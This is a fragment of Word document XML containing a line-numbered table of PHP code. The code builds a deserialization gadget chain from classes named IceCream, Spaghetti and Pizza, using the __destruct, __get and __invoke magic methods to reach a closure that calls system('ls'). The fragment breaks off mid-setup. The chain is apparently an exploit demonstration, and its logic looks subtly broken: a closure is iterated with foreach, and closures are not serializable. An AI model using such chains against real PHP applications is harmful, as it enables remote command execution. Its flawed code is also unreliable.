            </w:r>
          </w:p>
          <w:p w14:paraId="190C11FF" w14:textId="77777777" w:rsidR="006E1E7E" w:rsidRPr="006E1E7E" w:rsidRDefault="006E1E7E" w:rsidP="006E1E7E">
            <w:r w:rsidRPr="006E1E7E">
              <w:t>11</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F1B1682" w14:textId="77777777" w:rsidR="006E1E7E" w:rsidRPr="006E1E7E" w:rsidRDefault="006E1E7E" w:rsidP="006E1E7E">
            <w:r w:rsidRPr="006E1E7E">
              <w:t>12</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D3B863E" w14:textId="77777777" w:rsidR="006E1E7E" w:rsidRPr="006E1E7E" w:rsidRDefault="006E1E7E" w:rsidP="006E1E7E">
            <w:r w:rsidRPr="006E1E7E">
              <w:lastRenderedPageBreak/>
              <w:t>13</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F99CCAA" w14:textId="77777777" w:rsidR="006E1E7E" w:rsidRPr="006E1E7E" w:rsidRDefault="006E1E7E" w:rsidP="006E1E7E">
            <w:r w:rsidRPr="006E1E7E">
              <w:t>14</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A4D9549" w14:textId="77777777" w:rsidR="006E1E7E" w:rsidRPr="006E1E7E" w:rsidRDefault="006E1E7E" w:rsidP="006E1E7E">
            <w:r w:rsidRPr="006E1E7E">
              <w:t>15</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D64F15B" w14:textId="77777777" w:rsidR="006E1E7E" w:rsidRPr="006E1E7E" w:rsidRDefault="006E1E7E" w:rsidP="006E1E7E">
            <w:r w:rsidRPr="006E1E7E">
              <w:t>16</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="448BEFBF" w14:textId="77777777" w:rsidR="006E1E7E" w:rsidRPr="006E1E7E" w:rsidRDefault="006E1E7E" w:rsidP="006E1E7E">
            <w:r w:rsidRPr="006E1E7E">
              <w:t>17</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47795B5C" w14:textId="77777777" w:rsidR="006E1E7E" w:rsidRPr="006E1E7E" w:rsidRDefault="006E1E7E" w:rsidP="006E1E7E">
            <w:r w:rsidRPr="006E1E7E">
              <w:t>18</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15B2C49F" w14:textId="77777777" w:rsidR="006E1E7E" w:rsidRPr="006E1E7E" w:rsidRDefault="006E1E7E" w:rsidP="006E1E7E">
            <w:r w:rsidRPr="006E1E7E">
              <w:t>19</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="062DC655" w14:textId="77777777" w:rsidR="006E1E7E" w:rsidRPr="006E1E7E" w:rsidRDefault="006E1E7E" w:rsidP="006E1E7E">
            <w:r w:rsidRPr="006E1E7E">
              <w:t>20</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="251E51B2" w14:textId="77777777" w:rsidR="006E1E7E" w:rsidRPr="006E1E7E" w:rsidRDefault="006E1E7E" w:rsidP="006E1E7E">
            <w:r w:rsidRPr="006E1E7E">
              <w:t>21</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1730D097" w14:textId="77777777" w:rsidR="006E1E7E" w:rsidRPr="006E1E7E" w:rsidRDefault="006E1E7E" w:rsidP="006E1E7E">
            <w:r w:rsidRPr="006E1E7E">
              <w:t>22</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46BEE9CD" w14:textId="77777777" w:rsidR="006E1E7E" w:rsidRPr="006E1E7E" w:rsidRDefault="006E1E7E" w:rsidP="006E1E7E">
            <w:r w:rsidRPr="006E1E7E">
              <w:t>23</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="251C391D" w14:textId="77777777" w:rsidR="006E1E7E" w:rsidRPr="006E1E7E" w:rsidRDefault="006E1E7E" w:rsidP="006E1E7E">
            <w:r w:rsidRPr="006E1E7E">
              <w:t>24</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46C7C6A1" w14:textId="77777777" w:rsidR="006E1E7E" w:rsidRPr="006E1E7E" w:rsidRDefault="006E1E7E" w:rsidP="006E1E7E">
            <w:r w:rsidRPr="006E1E7E">
              <w:t>25</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="791BF80F" w14:textId="77777777" w:rsidR="006E1E7E" w:rsidRPr="006E1E7E" w:rsidRDefault="006E1E7E" w:rsidP="006E1E7E">
            <w:r w:rsidRPr="006E1E7E">
              <w:t>26</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41085507" w14:textId="77777777" w:rsidR="006E1E7E" w:rsidRPr="006E1E7E" w:rsidRDefault="006E1E7E" w:rsidP="006E1E7E">
            <w:r w:rsidRPr="006E1E7E">
              <w:t>27</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77B2D7DD" w14:textId="77777777" w:rsidR="006E1E7E" w:rsidRPr="006E1E7E" w:rsidRDefault="006E1E7E" w:rsidP="006E1E7E">
            <w:r w:rsidRPr="006E1E7E">
              <w:t>28</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23102FD3" w14:textId="77777777" w:rsidR="006E1E7E" w:rsidRPr="006E1E7E" w:rsidRDefault="006E1E7E" w:rsidP="006E1E7E">
            <w:r w:rsidRPr="006E1E7E">
              <w:t>29</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F0772EA" w14:textId="77777777" w:rsidR="006E1E7E" w:rsidRPr="006E1E7E" w:rsidRDefault="006E1E7E" w:rsidP="006E1E7E">
            <w:r w:rsidRPr="006E1E7E">
              <w:t>30</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BD05CDE" w14:textId="77777777" w:rsidR="006E1E7E" w:rsidRPr="006E1E7E" w:rsidRDefault="006E1E7E" w:rsidP="006E1E7E">
            <w:r w:rsidRPr="006E1E7E">
              <w:t>31</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23876CAB" w14:textId="77777777" w:rsidR="006E1E7E" w:rsidRPr="006E1E7E" w:rsidRDefault="006E1E7E" w:rsidP="006E1E7E">
            <w:r w:rsidRPr="006E1E7E">
              <w:t>32</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D60A28E" w14:textId="77777777" w:rsidR="006E1E7E" w:rsidRPr="006E1E7E" w:rsidRDefault="006E1E7E" w:rsidP="006E1E7E">
            <w:r w:rsidRPr="006E1E7E">
              <w:t>33</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F48F189" w14:textId="77777777" w:rsidR="006E1E7E" w:rsidRPr="006E1E7E" w:rsidRDefault="006E1E7E" w:rsidP="006E1E7E">
            <w:r w:rsidRPr="006E1E7E">
              <w:t>34</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C66E757" w14:textId="77777777" w:rsidR="006E1E7E" w:rsidRPr="006E1E7E" w:rsidRDefault="006E1E7E" w:rsidP="006E1E7E">
            <w:r w:rsidRPr="006E1E7E">
              <w:t>35</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22C5D4E4" w14:textId="77777777" w:rsidR="006E1E7E" w:rsidRPr="006E1E7E" w:rsidRDefault="006E1E7E" w:rsidP="006E1E7E">
            <w:r w:rsidRPr="006E1E7E">
              <w:t>36</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A84F1F7" w14:textId="77777777" w:rsidR="006E1E7E" w:rsidRPr="006E1E7E" w:rsidRDefault="006E1E7E" w:rsidP="006E1E7E">
            <w:r w:rsidRPr="006E1E7E">
              <w:t>37</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="794360FA" w14:textId="77777777" w:rsidR="006E1E7E" w:rsidRPr="006E1E7E" w:rsidRDefault="006E1E7E" w:rsidP="006E1E7E">
            <w:r w:rsidRPr="006E1E7E">
              <w:t>38</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28EC4544" w14:textId="77777777" w:rsidR="006E1E7E" w:rsidRPr="006E1E7E" w:rsidRDefault="006E1E7E" w:rsidP="006E1E7E">
            <w:r w:rsidRPr="006E1E7E">
              <w:t>39</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B2A11A8" w14:textId="77777777" w:rsidR="006E1E7E" w:rsidRPr="006E1E7E" w:rsidRDefault="006E1E7E" w:rsidP="006E1E7E">
            <w:r w:rsidRPr="006E1E7E">
              <w:t>40</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67F4063D" w14:textId="77777777" w:rsidR="006E1E7E" w:rsidRPr="006E1E7E" w:rsidRDefault="006E1E7E" w:rsidP="006E1E7E">
            <w:r w:rsidRPr="006E1E7E">
              <w:t>41</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17A03272" w14:textId="77777777" w:rsidR="006E1E7E" w:rsidRPr="006E1E7E" w:rsidRDefault="006E1E7E" w:rsidP="006E1E7E">
            <w:r w:rsidRPr="006E1E7E">
              <w:t>42</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77BC028C" w14:textId="77777777" w:rsidR="006E1E7E" w:rsidRPr="006E1E7E" w:rsidRDefault="006E1E7E" w:rsidP="006E1E7E">
            <w:r w:rsidRPr="006E1E7E">
              <w:t>43</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02BAAB7A" w14:textId="77777777" w:rsidR="006E1E7E" w:rsidRPr="006E1E7E" w:rsidRDefault="006E1E7E" w:rsidP="006E1E7E">
            <w:r w:rsidRPr="006E1E7E">
              <w:t>44</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E51091D" w14:textId="77777777" w:rsidR="006E1E7E" w:rsidRPr="006E1E7E" w:rsidRDefault="006E1E7E" w:rsidP="006E1E7E">
            <w:r w:rsidRPr="006E1E7E">
              <w:lastRenderedPageBreak/>
              <w:t>45</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15D7744F" w14:textId="77777777" w:rsidR="006E1E7E" w:rsidRPr="006E1E7E" w:rsidRDefault="006E1E7E" w:rsidP="006E1E7E">
            <w:r w:rsidRPr="006E1E7E">
              <w:t>46</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8849" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0595ABDB" w14:textId="77777777" w:rsidR="006E1E7E" w:rsidRPr="006E1E7E" w:rsidRDefault="006E1E7E" w:rsidP="006E1E7E">
            <w:r w:rsidRPr="006E1E7E">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>&lt;?php</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59EEAA07" w14:textId="77777777" w:rsidR="006E1E7E" w:rsidRPr="006E1E7E" w:rsidRDefault="006E1E7E" w:rsidP="006E1E7E"/>
          <w:p w14:paraId="33FDB499" w14:textId="77777777" w:rsidR="006E1E7E" w:rsidRPr="006E1E7E" w:rsidRDefault="006E1E7E" w:rsidP="006E1E7E">
            <w:r w:rsidRPr="006E1E7E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>namespace</w:t>
            </w:r>
            <w:r w:rsidRPr="006E1E7E">
              <w:t xml:space="preserve"> {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27061432" w14:textId="77777777" w:rsidR="006E1E7E" w:rsidRPr="006E1E7E" w:rsidRDefault="006E1E7E" w:rsidP="006E1E7E">
            <w:r w:rsidRPr="006E1E7E">
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="006E1E7E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>class</w:t>
            </w:r>
            <w:r w:rsidRPr="006E1E7E">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="006E1E7E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>IceCream</w:t>
            </w:r>
            <w:r w:rsidRPr="006E1E7E">
              <w:t xml:space="preserve"> {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F418800" w14:textId="77777777" w:rsidR="006E1E7E" w:rsidRPr="006E1E7E" w:rsidRDefault="006E1E7E" w:rsidP="006E1E7E">
            <w:r w:rsidRPr="006E1E7E">
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r w:rsidRPr="006E1E7E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>public</w:t>
            </w:r>
            <w:r w:rsidRPr="006E1E7E">
              <w:t xml:space="preserve"> $flavors;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="000B2692" w14:textId="77777777" w:rsidR="006E1E7E" w:rsidRPr="006E1E7E" w:rsidRDefault="006E1E7E" w:rsidP="006E1E7E">
            <w:r w:rsidRPr="006E1E7E">
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r w:rsidRPr="006E1E7E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>public</w:t>
            </w:r>
            <w:r w:rsidRPr="006E1E7E">
              <w:t xml:space="preserve"> $topping;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46D355DA" w14:textId="77777777" w:rsidR="006E1E7E" w:rsidRPr="006E1E7E" w:rsidRDefault="006E1E7E" w:rsidP="006E1E7E"/>
          <w:p w14:paraId="3491697C" w14:textId="77777777" w:rsidR="006E1E7E" w:rsidRPr="006E1E7E" w:rsidRDefault="006E1E7E" w:rsidP="006E1E7E">
            <w:r w:rsidRPr="006E1E7E">
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r w:rsidRPr="006E1E7E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>public</w:t>
            </w:r>
            <w:r w:rsidRPr="006E1E7E">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="006E1E7E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>function</w:t>
            </w:r>
            <w:r w:rsidRPr="006E1E7E">
              <w:t xml:space="preserve"> __invoke() {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="498880A1" w14:textId="77777777" w:rsidR="006E1E7E" w:rsidRPr="006E1E7E" w:rsidRDefault="006E1E7E" w:rsidP="006E1E7E">
            <w:r w:rsidRPr="006E1E7E">
              <w:t xml:space="preserve">            </w:t>
            </w:r>
            <w:r w:rsidRPr="006E1E7E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>foreach</w:t>
            </w:r>
            <w:r w:rsidRPr="006E1E7E">
              <w:t xml:space="preserve"> ($this-&gt;flavors </w:t>
            </w:r>
            <w:r w:rsidRPr="006E1E7E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>as</w:t>
            </w:r>
            <w:r w:rsidRPr="006E1E7E">
              <w:t xml:space="preserve"> $flavor) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14BB7E60" w14:textId="77777777" w:rsidR="006E1E7E" w:rsidRPr="006E1E7E" w:rsidRDefault="006E1E7E" w:rsidP="006E1E7E">
            <w:r w:rsidRPr="006E1E7E">
              <w:t xml:space="preserve">                </w:t>
            </w:r>
            <w:r w:rsidRPr="006E1E7E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>echo</w:t>
            </w:r>
            <w:r w:rsidRPr="006E1E7E">
              <w:t xml:space="preserve"> $flavor;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77EBF333" w14:textId="77777777" w:rsidR="006E1E7E" w:rsidRPr="006E1E7E" w:rsidRDefault="006E1E7E" w:rsidP="006E1E7E">
            <w:r w:rsidRPr="006E1E7E">
              <w:t xml:space="preserve">            }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31DDF2ED" w14:textId="77777777" w:rsidR="006E1E7E" w:rsidRPr="006E1E7E" w:rsidRDefault="006E1E7E" w:rsidP="006E1E7E">
            <w:r w:rsidRPr="006E1E7E">
              <w:t xml:space="preserve">        }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2ABD2A44" w14:textId="77777777" w:rsidR="006E1E7E" w:rsidRPr="006E1E7E" w:rsidRDefault="006E1E7E" w:rsidP="006E1E7E">
            <w:r w:rsidRPr="006E1E7E">
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">    }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="360B4713" w14:textId="77777777" w:rsidR="006E1E7E" w:rsidRPr="006E1E7E" w:rsidRDefault="006E1E7E" w:rsidP="006E1E7E"/>
          <w:p w14:paraId="69B26B9B" w14:textId="77777777" w:rsidR="006E1E7E" w:rsidRPr="006E1E7E" w:rsidRDefault="006E1E7E" w:rsidP="006E1E7E">
            <w:r w:rsidRPr="006E1E7E">
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="006E1E7E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>class</w:t>
            </w:r>
            <w:r w:rsidRPr="006E1E7E">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="006E1E7E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Spaghetti</w:t>
            </w:r>
            <w:r w:rsidRPr="006E1E7E">
              <w:t xml:space="preserve"> {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7CD712FD" w14:textId="77777777" w:rsidR="006E1E7E" w:rsidRPr="006E1E7E" w:rsidRDefault="006E1E7E" w:rsidP="006E1E7E">
            <w:r w:rsidRPr="006E1E7E">
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r w:rsidRPr="006E1E7E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>public</w:t>
            </w:r>
            <w:r w:rsidRPr="006E1E7E">
              <w:t xml:space="preserve"> $sauce;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62007383" w14:textId="77777777" w:rsidR="006E1E7E" w:rsidRPr="006E1E7E" w:rsidRDefault="006E1E7E" w:rsidP="006E1E7E">
            <w:r w:rsidRPr="006E1E7E">
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r w:rsidRPr="006E1E7E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>public</w:t>
            </w:r>
            <w:r w:rsidRPr="006E1E7E">
              <w:t xml:space="preserve"> $noodles;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="465C4F51" w14:textId="77777777" w:rsidR="006E1E7E" w:rsidRPr="006E1E7E" w:rsidRDefault="006E1E7E" w:rsidP="006E1E7E">
            <w:r w:rsidRPr="006E1E7E">
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r w:rsidRPr="006E1E7E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>public</w:t>
            </w:r>
            <w:r w:rsidRPr="006E1E7E">
              <w:t xml:space="preserve"> $portion;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E5BB163" w14:textId="77777777" w:rsidR="006E1E7E" w:rsidRPr="006E1E7E" w:rsidRDefault="006E1E7E" w:rsidP="006E1E7E"/>
          <w:p w14:paraId="7EB1106E" w14:textId="77777777" w:rsidR="006E1E7E" w:rsidRPr="006E1E7E" w:rsidRDefault="006E1E7E" w:rsidP="006E1E7E">
            <w:r w:rsidRPr="006E1E7E">
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r w:rsidRPr="006E1E7E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>public</w:t>
            </w:r>
            <w:r w:rsidRPr="006E1E7E">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="006E1E7E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>function</w:t>
            </w:r>
            <w:r w:rsidRPr="006E1E7E">
              <w:t xml:space="preserve"> __get($name) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69D05A9F" w14:textId="77777777" w:rsidR="006E1E7E" w:rsidRPr="006E1E7E" w:rsidRDefault="006E1E7E" w:rsidP="006E1E7E">
            <w:r w:rsidRPr="006E1E7E">
              <w:t xml:space="preserve">            ($this-&gt;sauce)();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79317FF7" w14:textId="77777777" w:rsidR="006E1E7E" w:rsidRPr="006E1E7E" w:rsidRDefault="006E1E7E" w:rsidP="006E1E7E">
            <w:r w:rsidRPr="006E1E7E">
              <w:t xml:space="preserve">        }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B0730BF" w14:textId="77777777" w:rsidR="006E1E7E" w:rsidRPr="006E1E7E" w:rsidRDefault="006E1E7E" w:rsidP="006E1E7E">
            <w:r w:rsidRPr="006E1E7E">
              <w:t xml:space="preserve">    }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5DE5FFB4" w14:textId="77777777" w:rsidR="006E1E7E" w:rsidRPr="006E1E7E" w:rsidRDefault="006E1E7E" w:rsidP="006E1E7E"/>
          <w:p w14:paraId="5B8F8105" w14:textId="77777777" w:rsidR="006E1E7E" w:rsidRPr="006E1E7E" w:rsidRDefault="006E1E7E" w:rsidP="006E1E7E">
            <w:r w:rsidRPr="006E1E7E">
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="006E1E7E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>class</w:t>
            </w:r>
            <w:r w:rsidRPr="006E1E7E">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="006E1E7E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Pizza</w:t>
            </w:r>
            <w:r w:rsidRPr="006E1E7E">
              <w:t xml:space="preserve"> {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B55747C" w14:textId="77777777" w:rsidR="006E1E7E" w:rsidRPr="006E1E7E" w:rsidRDefault="006E1E7E" w:rsidP="006E1E7E">
            <w:r w:rsidRPr="006E1E7E">
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r w:rsidRPr="006E1E7E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>public</w:t>
            </w:r>
            <w:r w:rsidRPr="006E1E7E">
              <w:t xml:space="preserve"> $price;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08628075" w14:textId="77777777" w:rsidR="006E1E7E" w:rsidRPr="006E1E7E" w:rsidRDefault="006E1E7E" w:rsidP="006E1E7E">
            <w:r w:rsidRPr="006E1E7E">
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r w:rsidRPr="006E1E7E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>public</w:t>
            </w:r>
            <w:r w:rsidRPr="006E1E7E">
              <w:t xml:space="preserve"> $cheese;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45E6BFF3" w14:textId="77777777" w:rsidR="006E1E7E" w:rsidRPr="006E1E7E" w:rsidRDefault="006E1E7E" w:rsidP="006E1E7E">
            <w:r w:rsidRPr="006E1E7E">
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r w:rsidRPr="006E1E7E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>public</w:t>
            </w:r>
            <w:r w:rsidRPr="006E1E7E">
              <w:t xml:space="preserve"> $size;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="405EB700" w14:textId="77777777" w:rsidR="006E1E7E" w:rsidRPr="006E1E7E" w:rsidRDefault="006E1E7E" w:rsidP="006E1E7E"/>
          <w:p w14:paraId="0C9F6028" w14:textId="77777777" w:rsidR="006E1E7E" w:rsidRPr="006E1E7E" w:rsidRDefault="006E1E7E" w:rsidP="006E1E7E">
            <w:r w:rsidRPr="006E1E7E">
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r w:rsidRPr="006E1E7E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>public</w:t>
            </w:r>
            <w:r w:rsidRPr="006E1E7E">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="006E1E7E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>function</w:t>
            </w:r>
            <w:r w:rsidRPr="006E1E7E">
              <w:t xml:space="preserve"> __destruct() {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59389A3F" w14:textId="77777777" w:rsidR="006E1E7E" w:rsidRPr="006E1E7E" w:rsidRDefault="006E1E7E" w:rsidP="006E1E7E">
            <w:r w:rsidRPr="006E1E7E">
              <w:t xml:space="preserve">            </w:t>
            </w:r>
            <w:r w:rsidRPr="006E1E7E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>echo</w:t>
            </w:r>
            <w:r w:rsidRPr="006E1E7E">
              <w:t xml:space="preserve"> $this-&gt;size-&gt;what;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B825A2C" w14:textId="77777777" w:rsidR="006E1E7E" w:rsidRPr="006E1E7E" w:rsidRDefault="006E1E7E" w:rsidP="006E1E7E">
            <w:r w:rsidRPr="006E1E7E">
              <w:t xml:space="preserve">        }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02CA2A6C" w14:textId="77777777" w:rsidR="006E1E7E" w:rsidRPr="006E1E7E" w:rsidRDefault="006E1E7E" w:rsidP="006E1E7E">
            <w:r w:rsidRPr="006E1E7E">
              <w:t xml:space="preserve">    }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20CA1C05" w14:textId="77777777" w:rsidR="006E1E7E" w:rsidRPr="006E1E7E" w:rsidRDefault="006E1E7E" w:rsidP="006E1E7E"/>
          <w:p w14:paraId="04A1BACC" w14:textId="77777777" w:rsidR="006E1E7E" w:rsidRPr="006E1E7E" w:rsidRDefault="006E1E7E" w:rsidP="006E1E7E">
            <w:r w:rsidRPr="006E1E7E">
              <w:t xml:space="preserve">    $iceCream = </w:t>
            </w:r>
            <w:r w:rsidRPr="006E1E7E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>new</w:t>
            </w:r>
            <w:r w:rsidRPr="006E1E7E">
              <w:t xml:space="preserve"> IceCream();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B87D975" w14:textId="77777777" w:rsidR="006E1E7E" w:rsidRPr="006E1E7E" w:rsidRDefault="006E1E7E" w:rsidP="006E1E7E">
            <w:r w:rsidRPr="006E1E7E">
              <w:t xml:space="preserve">    $iceCream-&gt;flavors = </w:t>
            </w:r>
            <w:r w:rsidRPr="006E1E7E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>function</w:t>
            </w:r>
            <w:r w:rsidRPr="006E1E7E">
              <w:t xml:space="preserve"> () { system(</w:t>
            </w:r>
            <w:r w:rsidRPr="006E1E7E">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"ls"</w:t>
            </w:r>
            <w:r w:rsidRPr="006E1E7E">
              <w:t xml:space="preserve">); }; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35AE43EF" w14:textId="77777777" w:rsidR="006E1E7E" w:rsidRPr="006E1E7E" w:rsidRDefault="006E1E7E" w:rsidP="006E1E7E">
            <w:r w:rsidRPr="006E1E7E">
              <w:t>;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7970E6E9" w14:textId="77777777" w:rsidR="006E1E7E" w:rsidRPr="006E1E7E" w:rsidRDefault="006E1E7E" w:rsidP="006E1E7E"/>
          <w:p w14:paraId="7B577698" w14:textId="77777777" w:rsidR="006E1E7E" w:rsidRPr="006E1E7E" w:rsidRDefault="006E1E7E" w:rsidP="006E1E7E">
            <w:r w:rsidRPr="006E1E7E">
              <w:t xml:space="preserve">    $spaghetti = </w:t>
            </w:r>
            <w:r w:rsidRPr="006E1E7E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>new</w:t>
            </w:r>
            <w:r w:rsidRPr="006E1E7E">
              <w:t xml:space="preserve"> Spaghetti();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="656DB275" w14:textId="77777777" w:rsidR="006E1E7E" w:rsidRPr="006E1E7E" w:rsidRDefault="006E1E7E" w:rsidP="006E1E7E">
            <w:r w:rsidRPr="006E1E7E">
              <w:t xml:space="preserve">    $spaghetti-&gt;sauce = $iceCream;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C641B7B" w14:textId="77777777" w:rsidR="006E1E7E" w:rsidRPr="006E1E7E" w:rsidRDefault="006E1E7E" w:rsidP="006E1E7E"/>
          <w:p w14:paraId="677F0384" w14:textId="77777777" w:rsidR="006E1E7E" w:rsidRPr="006E1E7E" w:rsidRDefault="006E1E7E" w:rsidP="006E1E7E">
            <w:r w:rsidRPr="006E1E7E">
              <w:t xml:space="preserve">    $pizza = </w:t>
            </w:r>
            <w:r w:rsidRPr="006E1E7E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>new</w:t>
            </w:r>
            <w:r w:rsidRPr="006E1E7E">
              <w:t xml:space="preserve"> Pizza();</w:t>
            </w:r>
          </w:p>
